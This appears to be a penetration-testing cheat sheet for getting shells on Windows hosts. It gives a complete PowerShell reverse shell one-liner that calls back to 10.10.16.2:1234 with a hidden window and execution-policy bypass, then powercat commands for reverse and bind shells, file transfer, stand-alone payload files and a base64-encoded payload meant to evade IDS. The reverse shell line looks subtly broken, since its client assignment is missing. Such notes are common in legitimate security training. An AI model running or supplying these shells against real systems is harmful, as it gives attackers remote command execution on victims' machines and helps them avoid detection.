Reverse Shell
1
| powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
Powercat
It is a script we can download to a Windows host to leverage the strengths of PowerShell and simplifies the creation of bind/reverse shells
The script is under /usr/share/windows-resources/powercat. Initialize the script (once uploaded)
1
| PS C:\Users\Offsec> . .\powercat.ps1
|
Once uploaded We can execute powercat as follows:
1
2
| PS C:\Users\offsec> powercat
You must select either client mode (-c) or listen mode (-l).
|
Reverse shell:
1
| powercat -c <attacker_ip> -p <port> -e cmd.exe
|
Bind shell:
1
| powercat -l -p 443 -e cmd.exe
|
File Transfer:
By first opening a port with netcat:
1
| sudo nc -lnvp 443 > receiving_powercat.ps1
|
Then with -i flag choose the file path:
1
| powercat -c <attacker_ip> -p <port> -e cmd.exe -i C\Windows\Privesc\revershell.ps1
|
Stand-Alone Payload
You can redirect the output of powercat, then save it into a file and execute such file as a powershell script with the -g flag:
1
| powercat -c <attacker_ip> -p <port) -e cmd.exe -g > revershell.ps1
|
Encoded version (could … but unlikely, evade IDS):
First create the file with -ge flag:
1
| powercat -c <attacker_ip> -p <port> -e cmd.exe -ge > revershell.ps1
|
In order to run the payload run the -E flag:
1
| powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAHIAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAsACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAgACAAIAAgAGkAZgAoACQAZwBsAG8AYgBhAGwAOgBWAGUAcgBiAG8AcwBlACkAewAkAFYAZQByAGIAbwBzAGUAIAA9ACAAJABUAHIAdQBlAH0ACgAgACAAIAAgACQARgB1AG4AYwBWAGEAcgBzACAAPQAgAEAAewB9AAoAIAAgACAAIABpAGYAKAAhACQAbAApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAJABGAHUAbgBjAFYAYQByAHMAWwAiAGwAIgBdACAAPQAgACQARgBhAGwAcwBlAAoAIAAgACAAIAAgACAAJABTAG8AYwBrAGUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAKACAAIAAgACA
|
